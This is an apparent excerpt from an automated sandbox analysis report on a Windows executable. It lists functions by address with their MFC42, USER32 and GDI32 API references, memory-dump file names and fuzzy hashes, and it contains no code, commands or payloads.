Instruction Fuzzy Hash: 07F02B713007183FE6146B31ADC5D2F779DEB80748F41002FF10253261DE6D9C418678

Uniqueness

Uniqueness Score: -1.00%

Function 00401776, Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004095F0
#2414.MFC42 ref: 00409615
#2414.MFC42 ref: 00409633
#800.MFC42 ref: 00409641
#800.MFC42 ref: 0040964D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#800$H_prolog
String ID:
API String ID: 3907124237-0
Opcode ID: 152ab7fb3268ee573d22a734ced83172126d08d7c026de524b6dd7d3ba55a1be
Instruction ID: 3c0b81c694badcc60cb3818034c54aba7c4bda75703ae41a33f11ba6665e0a84
Opcode Fuzzy Hash: 152ab7fb3268ee573d22a734ced83172126d08d7c026de524b6dd7d3ba55a1be
Instruction Fuzzy Hash: BA01BCB1A00762DFC714DF9AD1456ADFBB8EF50318F60855FD042A3292D7F8AA04CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00421C73, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00421C94
#2414.MFC42 ref: 00421CA2
GetObjectA.GDI32(?,0000003C,?), ref: 00421CB0
CreateFontIndirectA.GDI32(?), ref: 00421CBA
#1641.MFC42(00000000), ref: 00421CC3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#2414CreateFontIndirectMessageObjectSend
String ID:
API String ID: 2499703250-0
Opcode ID: 0a5edbb7f5f92dc316239708accc8234e53c9400600e5f8e9b6af921dd261a2a
Instruction ID: 17e2822f778f66393ba22fc08adf9d904134ac8d7ecd0672b219fb452a358344
Opcode Fuzzy Hash: 0a5edbb7f5f92dc316239708accc8234e53c9400600e5f8e9b6af921dd261a2a
Instruction Fuzzy Hash: 11F08B3A300214BBDB01BBA5ECC9FAF7B6DBB98300F004039F605E71A2DE6499018768

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD0A, Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041DD0F
#2414.MFC42 ref: 0041DD3D
#800.MFC42 ref: 0041DD53
#2414.MFC42 ref: 0041DD6D
#620.MFC42 ref: 0041DD7A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$#620#800H_prolog
String ID:
API String ID: 3228753355-0
Opcode ID: e071de63d48a712b16245bb6acdf1446b179d63b1457598b3895c03286077aa4
Instruction ID: 0ac65fdf83e704af96b4c00f58f8eb9e112f9dd056291567bd9103da5c3e72db
Opcode Fuzzy Hash: e071de63d48a712b16245bb6acdf1446b179d63b1457598b3895c03286077aa4
Instruction Fuzzy Hash: 2F0188B0A00262DFDB10DF59A10539DFBB9AF94308FA0814F9091A3281DBF82A04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004207D7, Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004207DC
#818.MFC42 ref: 004207FB
#2414.MFC42 ref: 00420812
#2414.MFC42 ref: 00420830
#818.MFC42 ref: 0042083D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#818$H_prolog
String ID:
API String ID: 985162553-0
Opcode ID: f11e21dfd0d4f00c18d3171f3e88781fef84454c1e5929d648e2ad09dda39123
Instruction ID: 2a340050af13ebfd453432acc38de1707246dfcb3f902ec04e547a3ba8a08c10
Opcode Fuzzy Hash: f11e21dfd0d4f00c18d3171f3e88781fef84454c1e5929d648e2ad09dda39123
Instruction Fuzzy Hash: 09017CB0B00666AFD714EF59D14569DFBB8EF94308F61451FA041A3391C7F86A048B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8C4, Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

#858.MFC42(?), ref: 0041F8D3
#858.MFC42(?,?), ref: 0041F8E5
#858.MFC42(?,?,?), ref: 0041F8F1
#858.MFC42(?,?,?,?), ref: 0041F905
#858.MFC42(?,?,?,?,?), ref: 0041F91D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #858
String ID:
API String ID: 864555468-0
Opcode ID: 24d92abaca53573b21619979e62b339edc40104b26f1e7d2026d3682c2ce5d09
Instruction ID: 073922e084d5801f43397a7e241723e027c4c9233a7dba98aa78b271f0580e12
Opcode Fuzzy Hash: 24d92abaca53573b21619979e62b339edc40104b26f1e7d2026d3682c2ce5d09
Instruction Fuzzy Hash: 7801E876600A56ABCB20DF66D480896F3F8FF557143018A1FA56A83A00E734F559CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD9A, Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

#4454.MFC42(?), ref: 0041DDA9
#4287.MFC42(00000000,00000200,00000000,?), ref: 0041DDC2
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0041DDDE
CreateFontIndirectA.GDI32(?), ref: 0041DDF0
#1641.MFC42(00000000), ref: 0041DDFD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#4287#4454CreateFontIndirectInfoParametersSystem
String ID:
API String ID: 1227791690-0
Opcode ID: 967b08dd875329588dde94cffc96b7a12ce33c6f12b2209b871adec6e052194d
Instruction ID: f6235fc3dc994ff91d4b3808c2b859a4d7384bc6d0ecee838f8f647e1020064f
Opcode Fuzzy Hash: 967b08dd875329588dde94cffc96b7a12ce33c6f12b2209b871adec6e052194d
Instruction Fuzzy Hash: 98F09C71B00714ABFB20A774DC46FDD77685B40719F10012BB611DA2C1D67456848A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401055, Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D650
#535.MFC42(?), ref: 0040D66B
#535.MFC42(?,?,?), ref: 0040D67E
#800.MFC42(?,?,?), ref: 0040D699
#800.MFC42(?,?,?), ref: 0040D6A5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800$H_prolog
String ID:
API String ID: 4207097063-0
Opcode ID: 5f8e5833444c85771c231129dd361a8e030712bf76b6cbc8c9f7f2b4caff0417
Instruction ID: a794431daa8ee12737c26265ff04bdada76dcd12f9c8a2508d48cf22b5aeeccf
Opcode Fuzzy Hash: 5f8e5833444c85771c231129dd361a8e030712bf76b6cbc8c9f7f2b4caff0417
Instruction Fuzzy Hash: 360181B1A11158EFCB04EF55D506BEDBBB8EB15328F10815FE416632C2CBB86B04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9E1, Relevance: 7.5, APIs: 5, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 0040C9E8
#2863.MFC42(00000000), ref: 0040C9EF
#2438.MFC42(00000000), ref: 0040C9FA
#2455.MFC42(0000008C), ref: 0040CA23
SetMenu.USER32(?,00000000,0000008C), ref: 0040CA37

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2438#2455#2863
String ID:
API String ID: 1516751064-0
Opcode ID: a471702cac680e396357e0b276ba6e063477ff18b778cdf7cfa750681aac9fbe
Instruction ID: 28c48be746e4beeed77afa8c577dde8dca60916167150bd833b5b0c4d35216d4
Opcode Fuzzy Hash: a471702cac680e396357e0b276ba6e063477ff18b778cdf7cfa750681aac9fbe
Instruction Fuzzy Hash: BEF0E931700210DBCB24AB75A858E7F72E6BFC8304F05052EFA82D7281DE78DC029794

Uniqueness

Uniqueness Score: -1.00%

Function 004010CD, Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E25A
#324.MFC42(00000088,?), ref: 0040E26F
#567.MFC42(00000088,?), ref: 0040E27D
#540.MFC42(00000088,?), ref: 0040E294
#860.MFC42(00442178,00000088,?), ref: 0040E2AA

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #324#540#567#860H_prolog
String ID:
API String ID: 2764915820-0
Opcode ID: 50cdc1909ffbdc76211a4eb6ac8206d62f18efc31df1de870a3527d84b3b363c
Instruction ID: 36ae46193996c9f38daccfa7e8cb247b3d041299478e649d6a7a8b04f55d7813
Opcode Fuzzy Hash: 50cdc1909ffbdc76211a4eb6ac8206d62f18efc31df1de870a3527d84b3b363c
Instruction Fuzzy Hash: 6DF0F671B003609BCB10EB5595017AEBB65EFC1348F91801FF44167382CBFC1A00D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0042155C, Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00421561
#540.MFC42 ref: 00421573
#3874.MFC42(?), ref: 00421585
#535.MFC42(?,?), ref: 00421591
#800.MFC42(?,?), ref: 004215A0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3874#535#540#800H_prolog
String ID:
API String ID: 2906513136-0
Opcode ID: 80e998cf6b24fb73344748ee201b2523a69a5ec55c6dd00535a2ce3431179f99
Instruction ID: 4f30c8eb7d45269bdcaa9cc661f6eab50882e69283bd4e23f709bf66986150c7
Opcode Fuzzy Hash: 80e998cf6b24fb73344748ee201b2523a69a5ec55c6dd00535a2ce3431179f99
Instruction Fuzzy Hash: 32F01D72A20129ABCB04EF95D952BEEB778EF44318F50441FF411A7181DBB8AA04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE76, Relevance: 7.5, APIs: 5, Instructions: 32COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BE7B
#540.MFC42 ref: 0040BE8D
#3874.MFC42(?), ref: 0040BEA2
#535.MFC42(?,?), ref: 0040BEAE
#800.MFC42(?,?), ref: 0040BEBD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3874#535#540#800H_prolog
String ID:
API String ID: 2906513136-0
Opcode ID: f3eef2ec8ee45382b2d3583180ce11fab35989f806f3a05eb610f0c31c690f12
Instruction ID: 22ea5fc159d893c89df7f0b18c41b58264e1b795fcc99ce0d24a4a4933d8c7fc
Opcode Fuzzy Hash: f3eef2ec8ee45382b2d3583180ce11fab35989f806f3a05eb610f0c31c690f12
Instruction Fuzzy Hash: C8F04972A10029EBCB04EB95D952BEEB778EB44318F50401FE011A3181DB786B04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004119D7, Relevance: 7.5, APIs: 5, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 004119E3
#2864.MFC42(00000000), ref: 004119E6
GetWindow.USER32(?,00000005), ref: 004119F8
#2864.MFC42(00000000), ref: 004119FB
#4083.MFC42(0042DEE8,00000000), ref: 00411A0D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2864Window$#4083
String ID:
API String ID: 830143286-0
Opcode ID: 7cb8d6e3f8edf9ee1dd76861e02e210fb9e94c28c74b6c9a8cead509c9b45568
Instruction ID: 973802bb107dabcd4de9f71df7a32deb6c9179e43523b881f2b5d94b437ddd3e
Opcode Fuzzy Hash: 7cb8d6e3f8edf9ee1dd76861e02e210fb9e94c28c74b6c9a8cead509c9b45568
Instruction Fuzzy Hash: 90E02673B6053126C92173B5BC4AB8F2D54AB41B55B4301A7B900EB1B0E60CCC0186C8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDFB, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

#2379.MFC42 ref: 0040FDFF
#3495.MFC42 ref: 0040FE19
#4083.MFC42 ref: 0040FE20
#6199.MFC42(?), ref: 0040FE30
#3495.MFC42(?), ref: 0040FE37

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3495$#2379#4083#6199
String ID:
API String ID: 2540665707-0
Opcode ID: f5dfe6df7c6ca765d0b75e28688ccd679dd94276ba12917d7328179756cc23e5
Instruction ID: 07549e5d7f41ac114f5e4ac48badbe1a58fb0580ca321b053c94b01500663631
Opcode Fuzzy Hash: f5dfe6df7c6ca765d0b75e28688ccd679dd94276ba12917d7328179756cc23e5
Instruction Fuzzy Hash: 04E09A343002300BCA263337A91682FAAD6AFC0348746043FF842D72A2DE7CED0587AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEE0, Relevance: 7.5, APIs: 5, Instructions: 25COMMON

Download Yara Rule

APIs

#2642.MFC42(00000000), ref: 0040BEF6
#2642.MFC42(00000000,00000000), ref: 0040BF02
#2642.MFC42(00000000,00000000,00000000), ref: 0040BF0E
#2642.MFC42(00000000,00000000,00000000,00000000), ref: 0040BF1A
#2642.MFC42(00000000,00000000,00000000,00000000,00000000), ref: 0040BF26

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642
String ID:
API String ID: 1232775606-0
Opcode ID: 6c097732ba7cf899e0fd558be871d8e31191d6537bfa24dc248d504f56f6e7f1
Instruction ID: cdc984dcb0368f96dd82b44a322f6fb93811765e4533588c3e8a7dc295a19099
Opcode Fuzzy Hash: 6c097732ba7cf899e0fd558be871d8e31191d6537bfa24dc248d504f56f6e7f1
Instruction Fuzzy Hash: 08E09233110610D9C23DB635ED81EE7B3E6AFD1760F01097FBD9B92051DD242916C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 00402018, Relevance: 7.5, APIs: 5, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040AD96
#540.MFC42 ref: 0040ADA2
#4160.MFC42(00008050), ref: 0040ADB3
#6199.MFC42(?,00008050), ref: 0040ADBD
#800.MFC42(?,00008050), ref: 0040ADC9

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
